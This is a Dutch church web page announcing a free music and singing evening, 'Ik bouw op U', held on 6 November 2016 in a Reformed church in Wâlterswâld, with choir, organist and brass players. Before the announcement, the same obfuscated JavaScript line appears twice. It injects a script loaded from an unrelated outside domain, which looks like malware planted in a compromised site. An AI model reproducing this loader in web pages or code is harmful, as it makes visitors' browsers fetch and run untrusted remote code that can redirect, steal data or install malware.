;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Muziek- en zangavond ’Ik bouw op U’ - PKN Damwâld
6 november 2016
19:30 t/m 21:00
Muziek- en zangavond ’Ik bouw op U’

Muziek- en zangavond ’Ik bouw op U’

Op zondag 6 november zal er in de Gereformeerde kerk ’De Lichtbron’ (Tsjerkeloane 12, Wâlterswâld), weer een muziek- en zangavond worden gehouden. Deze avond begint om 19:30.

Het thema is dit maal: ‘Ik bouw op U!’. Een bekend lied, een veelzeggende tekst. Rondom dit thema wordt er deze avond gezongen en gemusiceerd.

Muzikale medewerking wordt verleend door Christelijk gemengd koor ‘Looft den Heer’ uit Wijnjewoude, o.l.v. Annejaap Soldaat, tenor Annejaap Soldaat, organist Jogchum Sipma en koperblazers Alle-Jacob van der Meulen en Johan Pilat.

Al met al belooft het weer een prachtige avond te worden, waar wij u en jullie van harte voor willen uitnodigen.

De toegang is gratis. Wel is er, ter bestrijding van de onkosten, na afloop een deurcollecte. Tevens is er na afloop gelegenheid tot het drinken van een kopje koffie, thee of fris.

Graag tot zondag 6 november, aanvang 19:30!